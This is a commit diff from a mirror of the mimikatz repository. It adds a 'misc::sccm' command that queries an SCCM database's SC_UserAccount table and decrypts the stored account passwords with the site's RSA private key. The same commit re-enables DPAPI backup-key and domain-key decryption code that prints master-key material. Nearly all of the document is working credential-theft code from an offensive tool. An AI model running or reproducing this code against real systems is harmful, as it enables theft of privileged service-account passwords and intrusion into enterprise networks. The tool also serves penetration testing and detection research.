RepoMirrors
/
mimikatz
mirror of https://github.com/gentilkiwi/mimikatz
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

[new] misc:sccm to decrypt SC_UserAccount credentials when SCCM private key access

This commit is contained in:
Benjamin DELPY 2021-05-11 20:34:56 +02:00
parent e10bde5b16
commit 734e3f0291
9 changed files with 241 additions and 66 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
inc/globals.h
View File

@ -117,6 +117,7 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
#define KULL_M_WIN_BUILD_10_1903 18362
#define KULL_M_WIN_BUILD_10_1909 18363
#define KULL_M_WIN_BUILD_10_2004 19041
#define KULL_M_WIN_BUILD_10_20H2 19042
#define KULL_M_WIN_MIN_BUILD_XP 2500

28
mimikatz/modules/dpapi/kuhl_m_dpapi.c
View File

@ -290,20 +290,20 @@ NTSTATUS kuhl_m_dpapi_masterkey(int argc, wchar_t * argv[])
}
}
//if(masterkeys->BackupKey && masterkeys->dwBackupKeyLen && convertedSid && (!(masterkeys->dwFlags & 1) || (pSystem && cbSystem)))
//{
// kprintf(L"\n[backupkey] %s DPAPI_SYSTEM: ", pSystem ? L"with" : L"without");
// if(pSystem)
// {
// kull_m_string_wprintf_hex(pSystem, cbSystem, 0);
// if(!(masterkeys->dwFlags & 1))
// kprintf(L" (but is not needed)");
// }
// kprintf(L"\n");
// if(kull_m_dpapi_unprotect_backupkey_with_secret(masterkeys->dwFlags, masterkeys->BackupKey, convertedSid, pSystem, cbSystem, &output, &cbOutput))
// kuhl_m_dpapi_display_MasterkeyInfosAndFree(NULL, output, cbOutput, NULL);
// else PRINT_ERROR(L"kull_m_dpapi_unprotect_backupkey_with_secret\n");
//}
if(masterkeys->BackupKey && masterkeys->dwBackupKeyLen && convertedSid && (!(masterkeys->dwFlags & 1) || (pSystem && cbSystem)))
{
kprintf(L"\n[backupkey] %s DPAPI_SYSTEM: ", pSystem ? L"with" : L"without");
if(pSystem)
{
kull_m_string_wprintf_hex(pSystem, cbSystem, 0);
if(!(masterkeys->dwFlags & 1))
kprintf(L" (but is not needed)");
}
kprintf(L"\n");
if(kull_m_dpapi_unprotect_backupkey_with_secret(masterkeys->dwFlags, masterkeys->BackupKey, convertedSid, pSystem, cbSystem, &output, &cbOutput))
kuhl_m_dpapi_display_MasterkeyInfosAndFree(NULL, output, cbOutput, NULL);
else PRINT_ERROR(L"kull_m_dpapi_unprotect_backupkey_with_secret\n");
}
if(masterkeys->DomainKey && masterkeys->dwDomainKeyLen)
{

138
mimikatz/modules/kuhl_m_misc.c
View File

@ -28,6 +28,7 @@ const KUHL_M_C kuhl_m_c_misc[] = {
{kuhl_m_misc_aadcookie, L"aadcookie", NULL},
{kuhl_m_misc_aadcookie_NgcSignWithSymmetricPopKey, L"ngcsign", NULL},
{kuhl_m_misc_spooler, L"spooler", NULL},
{kuhl_m_misc_sccm_accounts, L"sccm", NULL},
};
const KUHL_M kuhl_m_misc = {
L"misc", L"Miscellaneous module", NULL,
@ -1398,4 +1399,139 @@ NTSTATUS kuhl_m_misc_spooler(int argc, wchar_t * argv[])
else PRINT_ERROR(L"missing /server argument to specify spooler server");
return STATUS_SUCCESS;
}
}
typedef struct _SCCM_ENCRYPTED_HEADER {
DWORD cbKey;
DWORD cbDecrypted;
BYTE data[ANYSIZE_ARRAY];
} SCCM_ENCRYPTED_HEADER, *PSCCM_ENCRYPTED_HEADER;
const wchar_t SCCM_QUERY[] = L"SELECT SiteNumber, UserName, Password, Availability FROM SC_UserAccount";
NTSTATUS kuhl_m_misc_sccm_accounts(int argc, wchar_t * argv[])
{
LPCWCHAR szConnectionString, szPrivateKeyContainer;
SQLHANDLE hEnv, hCon, hSmt;
SQLRETURN ret;
unsigned long int SiteNumber;
char UserName[60], Password[2048];
BYTE Availability;
SQLLEN szUserName, szPassword;
PSCCM_ENCRYPTED_HEADER pEncrypted;
HCRYPTPROV hProv;
HCRYPTKEY hKey;
ALG_ID algid;
DWORD cbEncrypted, dwKeySetFlags, cbBuffer;
kull_m_string_args_byName(argc, argv, L"keycontainer", &szPrivateKeyContainer, L"Microsoft Systems Management Server");
dwKeySetFlags = kull_m_string_args_byName(argc, argv, L"keyuser", NULL, NULL) ? 0 : CRYPT_MACHINE_KEYSET;
kprintf(L"[CRYPTO] Private Key Container: %s (%s)\n", szPrivateKeyContainer, (dwKeySetFlags == CRYPT_MACHINE_KEYSET) ? L"machine" : L"user");
if(kull_m_string_args_byName(argc, argv, L"connectionstring", &szConnectionString, NULL))
{
kprintf(L"[ SQL ] ConnectionString: %s\n", szConnectionString);
SQLAllocHandle(SQL_HANDLE_ENV, SQL_NULL_HANDLE, &hEnv);
SQLSetEnvAttr(hEnv, SQL_ATTR_ODBC_VERSION, (SQLPOINTER)SQL_OV_ODBC3, 0);
SQLAllocHandle(SQL_HANDLE_DBC, hEnv, &hCon);
ret = SQLDriverConnect(hCon, NULL, (SQLWCHAR*) szConnectionString, SQL_NTS, NULL, 0, NULL, SQL_DRIVER_NOPROMPT);
switch (ret)
{
case SQL_SUCCESS:
case SQL_SUCCESS_WITH_INFO:
SQLAllocHandle(SQL_HANDLE_STMT, hCon, &hSmt);
kprintf(L"[ SQL ] Query to accounts: %s\n", SCCM_QUERY);
ret = SQLExecDirect(hSmt, (SQLWCHAR *) SCCM_QUERY, SQL_NTS);
if (ret == SQL_SUCCESS)
{
/* To avoid a lots of them */
kprintf(L"[CRYPTO] Acquiring local SCCM RSA Private Key\n");
if (CryptAcquireContext(&hProv, szPrivateKeyContainer, NULL, PROV_RSA_AES, dwKeySetFlags | CRYPT_SILENT))
{
/**/
kprintf(L"\n");
while (SQLFetch(hSmt) == SQL_SUCCESS)
{
ret = SQLGetData(hSmt, 1, SQL_C_ULONG, &SiteNumber, sizeof(SiteNumber), NULL);
if (ret == SQL_SUCCESS)
{
ret = SQLGetData(hSmt, 2, SQL_C_CHAR, UserName, sizeof(UserName), &szUserName);
if (ret == SQL_SUCCESS)
{
ret = SQLGetData(hSmt, 3, SQL_C_CHAR, Password, sizeof(Password), &szPassword);
if (ret == SQL_SUCCESS)
{
ret = SQLGetData(hSmt, 4, SQL_C_TINYINT, &Availability, sizeof(Availability), NULL);
if (ret == SQL_SUCCESS)
{
kprintf(L"[%u-%hhu] %.*S - ", SiteNumber, Availability, szUserName, UserName);
if (kull_m_crypto_StringToBinaryA(Password, (DWORD)szPassword, CRYPT_STRING_HEX, (PBYTE*)&pEncrypted, &cbEncrypted))
{
if (!Availability)
{
if (CryptImportKey(hProv, pEncrypted->data, pEncrypted->cbKey, 0, 0, &hKey))
{
cbBuffer = sizeof(ALG_ID);
if (CryptGetKeyParam(hKey, KP_ALGID, (BYTE*)&algid, &cbBuffer, 0))
{
kprintf(L"[%s] ", kull_m_crypto_algid_to_name(algid));
}
cbBuffer = cbEncrypted - FIELD_OFFSET(SCCM_ENCRYPTED_HEADER, data) - pEncrypted->cbKey;
if (CryptDecrypt(hKey, 0, TRUE, 0, pEncrypted->data + pEncrypted->cbKey, &cbBuffer))
{
if (cbBuffer == pEncrypted->cbDecrypted)
{
kprintf(L"%.*S\n", cbBuffer, pEncrypted->data + pEncrypted->cbKey);
}
else PRINT_ERROR(L"cbBuffer != cbDecrypted");
}
else PRINT_ERROR_AUTO(L"CryptDecrypt");
CryptDestroyKey(hKey);
}
else PRINT_ERROR_AUTO(L"CryptImportKey");
}
else kprintf(L"{todo if needed} \n"); // SELECT Name, Value1, Value2 FROM SC_SiteDefinition_Property WHERE Name LIKE 'GlobalAccount:%' (AES256 decrypt)
LocalFree(pEncrypted);
}
}
else PRINT_ERROR(L"SQLGetData(Availability): %u (0x%08x)\n", ret, ret);
}
else PRINT_ERROR(L"SQLGetData(Password): %u (0x%08x)\n", ret, ret);
}
else PRINT_ERROR(L"SQLGetData(UserName): %u (0x%08x)\n", ret, ret);
}
else PRINT_ERROR(L"SQLGetData(SiteNumber): %u (0x%08x)\n", ret, ret);
}
kprintf(L"\n");
/**/
kprintf(L"[CRYPTO] Releasing local SCCM RSA Private Key\n");
CryptReleaseContext(hProv, 0);
}
else PRINT_ERROR_AUTO(L"CryptAcquireContext");
/* No more crypto */
}
else PRINT_ERROR(L"SQLExecDirect: %u (0x%08x)\n", ret, ret);
SQLFreeHandle(SQL_HANDLE_STMT, hSmt);
break;
default:
PRINT_ERROR(L"SQLDriverConnect: %u (0x%08x)\n", ret, ret);
}
SQLDisconnect(hCon);
SQLFreeHandle(SQL_HANDLE_DBC, hCon);
SQLFreeHandle(SQL_HANDLE_ENV, hEnv);
}
else PRINT_ERROR(L"/connectionstring is needed, example: /connectionstring:\"DRIVER={SQL Server};Trusted=true;DATABASE=CM_PRD;SERVER=myserver.fqdn\\instancename;\"\n");
return STATUS_SUCCESS;
}

7
mimikatz/modules/kuhl_m_misc.h
View File

@ -15,6 +15,12 @@
#include "../../modules/kull_m_crypto_ngc.h"
#include "../../modules/rpc/kull_m_rpc_ms-rprn.h"
#include <fltUser.h>
#include <sql.h>
#pragma warning(push)
#pragma warning(disable:4201)
#include <sqlext.h>
#pragma warning(pop)
#include <sqltypes.h>
const KUHL_M kuhl_m_misc;
@ -38,6 +44,7 @@ NTSTATUS kuhl_m_misc_xor(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_misc_aadcookie(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_misc_aadcookie_NgcSignWithSymmetricPopKey(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_misc_spooler(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_misc_sccm_accounts(int argc, wchar_t * argv[]);
BOOL CALLBACK kuhl_m_misc_detours_callback_process(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg);
BOOL CALLBACK kuhl_m_misc_detours_callback_module(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg);

34
modules/kull_m_crypto.c
View File

@ -357,7 +357,7 @@ BOOL kull_m_crypto_hkey_session(ALG_ID calgid, LPCVOID key, DWORD keyLen, DWORD
if(CryptAcquireContext(hSessionProv, container, NULL, PROV_RSA_AES, CRYPT_NEWKEYSET))
{
hPrivateKey = 0;
if(CryptGenKey(*hSessionProv, AT_KEYEXCHANGE, CRYPT_EXPORTABLE | RSA1024BIT_KEY, &hPrivateKey)) // 1024
if(CryptGenKey(*hSessionProv, AT_KEYEXCHANGE, CRYPT_EXPORTABLE | (RSA1024BIT_KEY / 2), &hPrivateKey)) // 1024
{
if(CryptExportKey(hPrivateKey, 0, PRIVATEKEYBLOB, 0, NULL, &dwkeyblob))
{
@ -384,7 +384,7 @@ BOOL kull_m_crypto_hkey_session(ALG_ID calgid, LPCVOID key, DWORD keyLen, DWORD
if(CryptImportKey(*hSessionProv, keyblob, dwkeyblob, 0, 0, &hPrivateKey))
{
dwkeyblob = (1024 / 8) + sizeof(ALG_ID) + sizeof(BLOBHEADER); // 1024
dwkeyblob = (1024 / 2 / 8) + sizeof(ALG_ID) + sizeof(BLOBHEADER); // 1024
if(pbSessionBlob = (LPBYTE)LocalAlloc(LPTR, dwkeyblob))
{
((BLOBHEADER *) pbSessionBlob)->bType = SIMPLEBLOB;
@ -401,6 +401,7 @@ BOOL kull_m_crypto_hkey_session(ALG_ID calgid, LPCVOID key, DWORD keyLen, DWORD
for (i = 0; i < dwkeyblob - (sizeof(ALG_ID) + sizeof(BLOBHEADER) + keyLen + 3); i++)
if (ptr[i] == 0) ptr[i] = 0x42;
pbSessionBlob[dwkeyblob - 2] = 2;
status = CryptImportKey(*hSessionProv, pbSessionBlob, dwkeyblob, hPrivateKey, flags, hSessionKey);
LocalFree(pbSessionBlob);
}
@ -1300,5 +1301,34 @@ BOOL kull_m_crypto_dh_simpleDecrypt(HCRYPTKEY key, LPVOID data, DWORD dataLen, L
}
CryptDestroyKey(hTmp);
}
return status;
}
BOOL kull_m_crypto_StringToBinaryA(LPCSTR pszString, DWORD cchString, DWORD dwFlags, PBYTE* ppbBinary, PDWORD pcbBinary)
{
BOOL status = FALSE;
*ppbBinary = NULL;
*pcbBinary = 0;
if (CryptStringToBinaryA(pszString, cchString, dwFlags, NULL, pcbBinary, NULL, NULL))
{
*ppbBinary = (PBYTE)LocalAlloc(LPTR, *pcbBinary);
if (*ppbBinary)
{
if (CryptStringToBinaryA(pszString, cchString, dwFlags, *ppbBinary, pcbBinary, NULL, NULL))
{
status = TRUE;
}
else
{
PRINT_ERROR_AUTO(L"CryptStringToBinaryA(data)");
*ppbBinary = (PBYTE)LocalFree(*ppbBinary);
*pcbBinary = 0;
}
}
}
else PRINT_ERROR_AUTO(L"CryptStringToBinaryA(init)");
return status;
}

1
modules/kull_m_crypto.h
View File

@ -199,6 +199,7 @@ PKIWI_DH kull_m_crypto_dh_Create(ALG_ID targetSessionKeyType);
BOOL kull_m_crypto_dh_CreateSessionKey(PKIWI_DH dh, PMIMI_PUBLICKEY publicKey);
BOOL kull_m_crypto_dh_simpleEncrypt(HCRYPTKEY key, LPVOID data, DWORD dataLen, LPVOID *out, DWORD *outLen);
BOOL kull_m_crypto_dh_simpleDecrypt(HCRYPTKEY key, LPVOID data, DWORD dataLen, LPVOID *out, DWORD *outLen);
BOOL kull_m_crypto_StringToBinaryA(LPCSTR pszString, DWORD cchString, DWORD dwFlags, PBYTE* ppbBinary, PDWORD pcbBinary);
#define IOCTL_GET_FEATURE_REQUEST SCARD_CTL_CODE(3400)
#define IOCTL_CCID_ESCAPE SCARD_CTL_CODE(3500)

92
modules/kull_m_dpapi.c
View File

@ -828,41 +828,41 @@ BOOL kull_m_dpapi_protect_masterkey_with_shaDerivedkey(PKULL_M_DPAPI_MASTERKEY m
return status;
}
//BOOL kull_m_dpapi_unprotect_backupkey_with_secret(DWORD flags, PKULL_M_DPAPI_MASTERKEY masterkey, PCWSTR sid, LPCVOID secret, DWORD secretLen, PVOID *output, DWORD *outputLen)
//{
// BOOL status = FALSE, isDPAPISecret = flags & 1;
// LPCBYTE ptrSecret = (LPCBYTE) secret;
// PVOID data, hash;
// ALG_ID algID = (masterkey->algHash == CALG_SHA_512) ? CALG_SHA_512 : CALG_SHA1;
// DWORD sidLen = (DWORD) (wcslen(sid) + 1) * sizeof(wchar_t), hashSize = kull_m_crypto_hash_len(algID), dataSize = sidLen;
//
// if(!isDPAPISecret || (isDPAPISecret && ptrSecret && secretLen))
// {
// if(secretLen == 2 * SHA_DIGEST_LENGTH + sizeof(DWORD))
// {
// ptrSecret += sizeof(DWORD);
// secretLen -= sizeof(DWORD);
// }
// if(isDPAPISecret)
// dataSize += secretLen;
// if(data = (PBYTE) LocalAlloc(LPTR, dataSize))
// {
// RtlCopyMemory(data, sid, sidLen);
// if(isDPAPISecret)
// RtlCopyMemory((PBYTE) data + sidLen, ptrSecret, secretLen);
//
// if(hash = LocalAlloc(LPTR, hashSize))
// {
// if(kull_m_crypto_hash(algID, data, dataSize, hash, hashSize))
// status = kull_m_dpapi_unprotect_masterkey_with_shaDerivedkey(masterkey, hash, hashSize, output, outputLen);
// LocalFree(hash);
// }
// LocalFree(data);
// }
// }
// else PRINT_ERROR(L"This backup key need DPAPI_SYSTEM secret\n");
// return status;
//}
BOOL kull_m_dpapi_unprotect_backupkey_with_secret(DWORD flags, PKULL_M_DPAPI_MASTERKEY masterkey, PCWSTR sid, LPCVOID secret, DWORD secretLen, PVOID *output, DWORD *outputLen)
{
BOOL status = FALSE, isDPAPISecret = flags & 1;
LPCBYTE ptrSecret = (LPCBYTE) secret;
PVOID data, hash;
ALG_ID algID = (masterkey->algHash == CALG_SHA_512) ? CALG_SHA_512 : CALG_SHA1;
DWORD sidLen = (DWORD) (wcslen(sid) + 1) * sizeof(wchar_t), hashSize = kull_m_crypto_hash_len(algID), dataSize = sidLen;
if(!isDPAPISecret || (isDPAPISecret && ptrSecret && secretLen))
{
if(secretLen == 2 * SHA_DIGEST_LENGTH + sizeof(DWORD))
{
ptrSecret += sizeof(DWORD);
secretLen -= sizeof(DWORD);
}
if(isDPAPISecret)
dataSize += secretLen;
if(data = (PBYTE) LocalAlloc(LPTR, dataSize))
{
RtlCopyMemory(data, sid, sidLen);
if(isDPAPISecret)
RtlCopyMemory((PBYTE) data + sidLen, ptrSecret, secretLen);
if(hash = LocalAlloc(LPTR, hashSize))
{
if(kull_m_crypto_hash(algID, data, dataSize, hash, hashSize))
status = kull_m_dpapi_unprotect_masterkey_with_shaDerivedkey(masterkey, hash, hashSize, output, outputLen);
LocalFree(hash);
}
LocalFree(data);
}
}
else PRINT_ERROR(L"This backup key need DPAPI_SYSTEM secret\n");
return status;
}
BOOL kull_m_dpapi_unprotect_domainkey_with_key(PKULL_M_DPAPI_MASTERKEY_DOMAINKEY domainkey, LPCVOID key, DWORD keyLen, PVOID *output, DWORD *outputLen, PSID *sid)
{
@ -885,11 +885,11 @@ BOOL kull_m_dpapi_unprotect_domainkey_with_key(PKULL_M_DPAPI_MASTERKEY_DOMAINKEY
RtlCopyMemory(rsa_buffer, domainkey->pbSecret, cbOutput);
if(CryptDecrypt(hKey, 0, TRUE, 0, (PBYTE) rsa_buffer, &cbOutput))
{
//kprintf(L"\nRSA decrypt is a success\n");
//kprintf(L" * MasterKey len: %u\n", rsa_buffer->cbMasterKey);
//kull_m_string_wprintf_hex(rsa_buffer->buffer, rsa_buffer->cbMasterKey, 1 | (16 << 16));
//kprintf(L" * SuppKey len: %u\n", rsa_buffer->cbSuppKey);
//kull_m_string_wprintf_hex(rsa_buffer->buffer + rsa_buffer->cbMasterKey, rsa_buffer->cbSuppKey, 1 | (16 << 16));
kprintf(L"\nRSA decrypt is a success\n");
kprintf(L" * MasterKey len: %u\n", rsa_buffer->cbMasterKey);
kull_m_string_wprintf_hex(rsa_buffer->buffer, rsa_buffer->cbMasterKey, 1 | (16 << 16));
kprintf(L" * SuppKey len: %u\n", rsa_buffer->cbSuppKey);
kull_m_string_wprintf_hex(rsa_buffer->buffer + rsa_buffer->cbMasterKey, rsa_buffer->cbSuppKey, 1 | (16 << 16));
if(kull_m_crypto_hkey(hProv, CALG_3DES, rsa_buffer->buffer + rsa_buffer->cbMasterKey, 192 / 8, 0, &hSessionKey, &hSessionProv))
{
if(CryptSetKeyParam(hSessionKey, KP_IV, rsa_buffer->buffer + rsa_buffer->cbMasterKey + 192 / 8, 0))
@ -903,14 +903,14 @@ BOOL kull_m_dpapi_unprotect_domainkey_with_key(PKULL_M_DPAPI_MASTERKEY_DOMAINKEY
if(CryptDecrypt(hSessionKey, 0, FALSE, 0, (PBYTE) des_buffer, &cbOutput))
{
pSid = (PSID) (des_buffer->data + des_buffer->dataLen);
//kprintf(L"\n3DES decrypt is a success too\n");
////kull_m_string_wprintf_hex(des_buffer, outSize, 1 | (16 << 16)); kprintf(L"\n");
//kprintf(L" * nonce : "); kull_m_string_wprintf_hex(des_buffer->data, des_buffer->dataLen, 0); kprintf(L"\n"); // try to leave it as is =)
//kprintf(L" * SID : "); kull_m_string_displaySID(pSid); kprintf(L"\n");
//kprintf(L" * SHA1 : "); kull_m_string_wprintf_hex((PBYTE) des_buffer + cbOutput - SHA_DIGEST_LENGTH, SHA_DIGEST_LENGTH, 0); kprintf(L"\n");
kprintf(L"\n3DES decrypt is a success too\n");
kull_m_string_wprintf_hex(des_buffer, cbOutput, 1 | (16 << 16)); kprintf(L"\n");
kprintf(L" * nonce : "); kull_m_string_wprintf_hex(des_buffer->data, des_buffer->dataLen, 0); kprintf(L"\n"); // try to leave it as is =)
kprintf(L" * SID : "); kull_m_string_displaySID(pSid); kprintf(L"\n");
kprintf(L" * SHA1 : "); kull_m_string_wprintf_hex((PBYTE) des_buffer + cbOutput - SHA_DIGEST_LENGTH, SHA_DIGEST_LENGTH, 0); kprintf(L"\n");
if(kull_m_crypto_hash(CALG_SHA1, des_buffer, cbOutput - SHA_DIGEST_LENGTH, digest, SHA_DIGEST_LENGTH))
{
//kprintf(L" > Calc SHA1: "); kull_m_string_wprintf_hex(digest, SHA_DIGEST_LENGTH, 0); kprintf(L"\n");
kprintf(L" > Calc SHA1: "); kull_m_string_wprintf_hex(digest, SHA_DIGEST_LENGTH, 0); kprintf(L"\n");
if(RtlEqualMemory((PBYTE) des_buffer + cbOutput - SHA_DIGEST_LENGTH, digest, SHA_DIGEST_LENGTH))
{
*outputLen = rsa_buffer->cbMasterKey;

2
modules/kull_m_dpapi.h
View File

@ -186,7 +186,7 @@ BOOL kull_m_dpapi_protect_masterkey_with_password(DWORD flags, PKULL_M_DPAPI_MAS
BOOL kull_m_dpapi_protect_masterkey_with_userHash(PKULL_M_DPAPI_MASTERKEY masterkey, LPCVOID userHash, DWORD userHashLen, PCWSTR sid, BOOL isKeyOfProtectedUser, LPCVOID pbKey, DWORD dwKey, OPTIONAL LPCVOID pbInternalSalt);
BOOL kull_m_dpapi_protect_masterkey_with_shaDerivedkey(PKULL_M_DPAPI_MASTERKEY masterkey, LPCVOID shaDerivedkey, DWORD shaDerivedkeyLen, LPCVOID pbKey, DWORD dwKey, OPTIONAL LPCVOID pbInternalSalt);
//BOOL kull_m_dpapi_unprotect_backupkey_with_secret(DWORD flags, PKULL_M_DPAPI_MASTERKEY masterkey, PCWSTR sid, LPCVOID secret, DWORD secretLen, PVOID *output, DWORD *outputLen);
BOOL kull_m_dpapi_unprotect_backupkey_with_secret(DWORD flags, PKULL_M_DPAPI_MASTERKEY masterkey, PCWSTR sid, LPCVOID secret, DWORD secretLen, PVOID *output, DWORD *outputLen);
BOOL kull_m_dpapi_unprotect_domainkey_with_key(PKULL_M_DPAPI_MASTERKEY_DOMAINKEY domainkey, LPCVOID key, DWORD keyLen, PVOID *output, DWORD *outputLen, PSID *sid);
BOOL kull_m_dpapi_unprotect_domainkey_with_rpc(PKULL_M_DPAPI_MASTERKEYS masterkeys, PVOID rawMasterkeys, LPCWSTR server, PVOID *output, DWORD *outputLen);

4
modules/rpc/kull_m_rpc_ms-rprn.h
View File

@ -1,9 +1,9 @@
#pragma once
#include "kull_m_rpc.h"
/*
#define PRINTER_CHANGE_ADD_JOB 0x00000100
#define PRINTER_CHANGE_ALL 0x7777FFFF
*/
#define PRINTER_NOTIFY_CATEGORY_ALL 0x00010000
typedef void *PRINTER_HANDLE;